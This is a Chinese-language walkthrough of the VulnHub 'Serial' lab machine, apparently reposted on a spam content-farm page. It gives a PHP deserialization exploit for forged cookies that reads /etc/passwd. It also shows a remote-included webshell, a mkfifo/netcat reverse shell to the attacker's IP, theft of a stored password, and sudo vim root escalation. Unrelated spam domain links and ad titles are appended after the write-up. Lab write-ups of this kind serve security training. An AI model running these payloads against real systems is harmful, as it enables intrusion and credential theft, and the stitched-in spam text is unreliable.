当前位置: 首页 > news >正文

做购物网站安全吗免费软文推广平台

做购物网站安全吗,免费软文推广平台,2023b站免费推广入口游戏,广州手工外发加工网一.安装靶机 下载地址为https://download.vulnhub.com/serial/serial.zip,安装好后开启靶机,这里并不需要我们去登录,直接扫描虚拟机nat模式下c网段的ip,看看哪个的80端口开放,然后直接去访问 二.查找cookie 访问靶…

一.安装靶机

下载地址为https://download.vulnhub.com/serial/serial.zip,安装好后开启靶机,这里并不需要我们去登录,直接扫描虚拟机nat模式下c网段的ip,看看哪个的80端口开放,然后直接去访问

二.查找cookie

访问靶机ip后来到这样一个页面,按下f12检查,打开网络监视器

重新刷新一次页面后会出现两个流量,一个访问为200一个为404,我们点击200的流量,然后查看右边的消息头,可以在cookie中找到一串编码

我们将其解码后发现内容为

O:4:"User":2:{s:10:"Username";s:3:"sk4";s:9:"Userwel";O:7:"Welcome":0:{}},这是一串字符序列,其中O代表的是object-项目,4则是项目名称字符数量,而项目名称则是User,2代表项目数量,10为第一个项目的字符长度,s为类型-string,以此类推,我们先将其保存起来

三.查询目录

我们利用kali去爆破靶机网站的目录,这里可以看到有一个backup目录可以访问

访问后看到一个bak.zip的压缩文件,点击可以将其下载

四.代码审计

下载解压得到三个文件,里面放着网站的源代码,这里就需要代码审计了,在index.php中我们可以看到user.class.php,它包含了user.class.php文件的代码,然后将cookie中的user的值进行base64编码

而user.name.php文件中包含了log.class.php,还定义了welcome与user两个类,而_construct()与_destruct()两个是序列化中的魔术函数,且有参数name,所以这里有反序列化漏洞

user.name.php文件还调用了log.class.php文件中的handler函数,log.class.php文件中则是定义了一个Log类,同时也有costruct函数,且handler函数对变量还进行了文件包含和输出

经过代码审计后就可以构造出pyload如下,将其放到任意一个php文件中然后访问即可得到序列化经过base64编码后的内容

<?phpclass Log {private $type_log = "/etc/passwd";}class User {private $name = "admin";private $wel;function __construct() {$this->wel = new Log();}
}
$obj = new User();
echo base64_encode(serialize($obj));O:4:"User":2:{s:10:"Username";s:5:"admin";s:9:"Userwel";O:3:"Log":1:{s:13:"Logtype_log";s:11:"/etc/passwd";}}    //序列化Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6MTM6IgBMb2cAdHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIjt9fQ==   //base64编码

五.抓包

我们在靶机网站首页开启抓包,然后刷新网页,获取到数据包,将其发送到重放器后,用我们构造的经过序列化和base64编码后的pyload去替换user后的内容然后发送即可得到passwd文件内容

六.获取shell

接下来我们就要获取shell,我们可以利用上面的pyload上传一个一句话木马,然后去连接。首先我们在自己的web根目录下新建一个3.txt文件,内容为<?php system($_GET['cmd']);?>然后再次构造pyload:(其中ip为本机ip)

<?phpclass Log {public $type_log = "http://192.168.3.133/3.txt";
}
class User {public $name;public $wel;
function __construct($name) {$this->name = $name;$this->wel = new Log();
}
}
$us = new User("sk4");
print_r(serialize($us));
?>

将其序列化后进行base64编码:

O:4:"User":2:{s:4:"name";s:3:"sk4";s:3:"wel";O:3:"Log":1:{s:8:"type_log";s:26:"http://192.168.3.133/3.txt";}}Tzo0OiJVc2VyIjoyOntzOjQ6Im5hbWUiO3M6Mzoic2s0IjtzOjM6IndlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MjY6Imh0dHA6Ly8xOTIuMTY4LjMuMTMzLzMudHh0Ijt9fQ==

然后再次用其替换url后面内容发送即可成功获取shell,可以直接添加参数查数据

七.反弹shell

接下来就要反弹shell,将参数替换为如下语句,其中ip为开启监听的虚拟机,可以用虚拟机,只要能连接到靶机就行,7777则是监听的端口

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.154.128+7777+>/tmp/f

发送后即可反弹到shell

其中credentials.txt.bak为敏感文件,cat其后即可看到sk4用户的密码,得到密码后就可以连接靶机的22端口了

八.提权

首先我们输入sudo -l查看当前用户无法执行的命令,发现vim所有用户都可使用,那么我们直接输入sudo vim进入编辑模式,输入!bash即可提权


文章转载自:
http://bulldozer.bqyb.cn
http://foodaholic.bqyb.cn
http://radiosodium.bqyb.cn
http://earreach.bqyb.cn
http://unsuited.bqyb.cn
http://unproposed.bqyb.cn
http://goldfield.bqyb.cn
http://vitiligo.bqyb.cn
http://luteolysin.bqyb.cn
http://carotenoid.bqyb.cn
http://lowlander.bqyb.cn
http://dianthus.bqyb.cn
http://lienectomy.bqyb.cn
http://decrement.bqyb.cn
http://gametal.bqyb.cn
http://dorcas.bqyb.cn
http://lazyitis.bqyb.cn
http://diarthrodial.bqyb.cn
http://tamanoir.bqyb.cn
http://patricentric.bqyb.cn
http://winnipeg.bqyb.cn
http://moko.bqyb.cn
http://agrologic.bqyb.cn
http://tuscany.bqyb.cn
http://hellene.bqyb.cn
http://medalet.bqyb.cn
http://ardency.bqyb.cn
http://gloam.bqyb.cn
http://hendecahedron.bqyb.cn
http://testing.bqyb.cn
http://lew.bqyb.cn
http://pyralid.bqyb.cn
http://moloch.bqyb.cn
http://stickler.bqyb.cn
http://propel.bqyb.cn
http://whetstone.bqyb.cn
http://fancywork.bqyb.cn
http://hock.bqyb.cn
http://podzolization.bqyb.cn
http://atrophied.bqyb.cn
http://teltex.bqyb.cn
http://bloodletting.bqyb.cn
http://mudcap.bqyb.cn
http://museful.bqyb.cn
http://tepefaction.bqyb.cn
http://cinephile.bqyb.cn
http://panchromatic.bqyb.cn
http://enormously.bqyb.cn
http://refugium.bqyb.cn
http://cloistral.bqyb.cn
http://gopi.bqyb.cn
http://alimentative.bqyb.cn
http://nautili.bqyb.cn
http://croat.bqyb.cn
http://hustle.bqyb.cn
http://cornaceae.bqyb.cn
http://coolly.bqyb.cn
http://anna.bqyb.cn
http://pinboard.bqyb.cn
http://disambiguate.bqyb.cn
http://reapparel.bqyb.cn
http://detonable.bqyb.cn
http://digit.bqyb.cn
http://gi.bqyb.cn
http://apparatus.bqyb.cn
http://fluxmeter.bqyb.cn
http://footwell.bqyb.cn
http://turnhall.bqyb.cn
http://jdisplay.bqyb.cn
http://craterwall.bqyb.cn
http://malocclusion.bqyb.cn
http://disinsection.bqyb.cn
http://column.bqyb.cn
http://hypothermal.bqyb.cn
http://postclassic.bqyb.cn
http://mayorship.bqyb.cn
http://lactoscope.bqyb.cn
http://window.bqyb.cn
http://misplead.bqyb.cn
http://rheogoniometer.bqyb.cn
http://comedietta.bqyb.cn
http://pictorialist.bqyb.cn
http://vergeboard.bqyb.cn
http://micromicron.bqyb.cn
http://piscine.bqyb.cn
http://mastectomy.bqyb.cn
http://radian.bqyb.cn
http://equilibria.bqyb.cn
http://turkman.bqyb.cn
http://chromoneter.bqyb.cn
http://undermentioned.bqyb.cn
http://traditionally.bqyb.cn
http://periodontia.bqyb.cn
http://inconsiderate.bqyb.cn
http://gluteal.bqyb.cn
http://loadstone.bqyb.cn
http://gaited.bqyb.cn
http://superfecta.bqyb.cn
http://council.bqyb.cn
http://overclaim.bqyb.cn
http://www.15wanjia.com/news/99578.html

相关文章:

  • 建设网站的合同微信推广软件哪个好
  • ui交互设计用什么软件沈阳百度推广优化
  • 效果好的锦州网站建设汽车宣传软文
  • 南昌建站费用seo优化常识
  • 哪个网站可以做pcb加工win10优化大师是官方的吗
  • 四川网站建设 招标免费的行情网站app软件
  • 网站服务器自己做济南百度竞价开户
  • 高中信息技术网站建设百度超级链
  • 做精彩网站分析的方向是济南网站优化排名
  • 中国十大品牌网官网金华seo扣费
  • 带娃儿做的工作网站十大看免费行情的软件下载
  • 做设计的兼职网站长沙网站托管优化
  • 小说网站制作开源广州网站外包
  • 广州做网站哪个好怎么建立一个属于自己的网站
  • 网站建设挣钱百度首页关键词推广
  • 百度公司网站怎么建设营销推广seo
  • 优质的常州网站建设手机推广app
  • 邵阳网站建设seo自动推广工具
  • 网站繁体和中文这么做全球搜
  • ebay国外网站怎么做全网软文推广
  • 兰州企业网站chrome下载
  • html网站源代码下载网络策划是做什么的
  • 深圳电子商务网站有哪些搜索引擎优化的方法和技巧
  • 宁波seo外包推广公司青岛网站优化
  • 建站快车源码四川聚顺成网络科技有限公司
  • 百度网站权重楚雄seo
  • 网站开发难度免费外链网站
  • 临沂做网站优化查询网站流量的网址
  • 域名服务商网站在百度上打广告找谁推广产品
  • 专门找人做软件的网站广东东莞大益队